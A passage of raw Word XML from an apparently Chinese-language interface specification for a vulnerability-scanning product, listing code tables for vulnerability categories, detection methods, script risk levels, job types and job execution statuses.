      <w:tr w:rsidR="00497C54" w14:paraId="2D9CAECD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F7C0365" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="739AFD80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BFC001A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="21ACA2FD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EEAC1A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F13A23F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F44137D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任意文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0EFC3077" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F5920F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F13499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517BA1D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任意文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B0383F7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BDBEEAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F5FDAC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5806A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拒绝服务攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7206EB8E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30EA7206" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D251B1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="038DCD3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目录遍历</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58563DE3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E879D5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AC356E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008A6520" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>恶意后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1801DEE9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F910F52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B05AAA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236FEDC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>本地提权</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D785464" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD14E8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABEB8F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CA6B04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C4A554C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="漏洞允许的检测方式"/>
      <w:bookmarkEnd w:id="291"/>
      <w:r>
        <w:t>漏洞允许的检测方式</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2124"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="075889D3"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AB71DB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DFB34BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69233942" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="033E689D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AAC05E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646AFC67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7761EFEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>版本对比</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28A6A285" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3FF8EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3D3DD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017961B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BB5909E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="漏洞检测脚本执行风险"/>
      <w:bookmarkEnd w:id="292"/>
      <w:r>
        <w:t>漏洞检测脚本执行风险</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1708"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="07AE733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F79B7FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9466C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2737185D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2751FB7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A87C1A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="551C087E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F7E9CCC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B1CF0DE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F294819" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DBF9337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="797F7E4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>低风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06C31148" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1051449A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C17428" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5091DC73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>中风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="573F06E2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047AA10C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F80EB13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC72E11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27F7FB99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="294" w:name="漏洞作业类型"/>
      <w:bookmarkEnd w:id="293"/>
      <w:r>
        <w:t>漏洞作业类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4973E0E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F7BDAD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D878E7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54728C0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="730E619D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D880CBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="675D43B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFB9EF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全局作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07A0FBC1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C3B5DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="342442BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E211EA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45E6D8EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="漏洞作业执行状态"/>
      <w:bookmarkEnd w:id="294"/>
      <w:r>
        <w:t>漏洞作业执行状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="67F5D1E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41CF6AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26305159" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26AD7888" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6014F97D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C822BE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08DA7A4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4092F02E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未开始执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15409EB0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB41604" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABD569E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB0C9F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排队执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B7EB174" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B1481E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC77A92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB5E0D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BB0BA27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766A8ED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F60CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
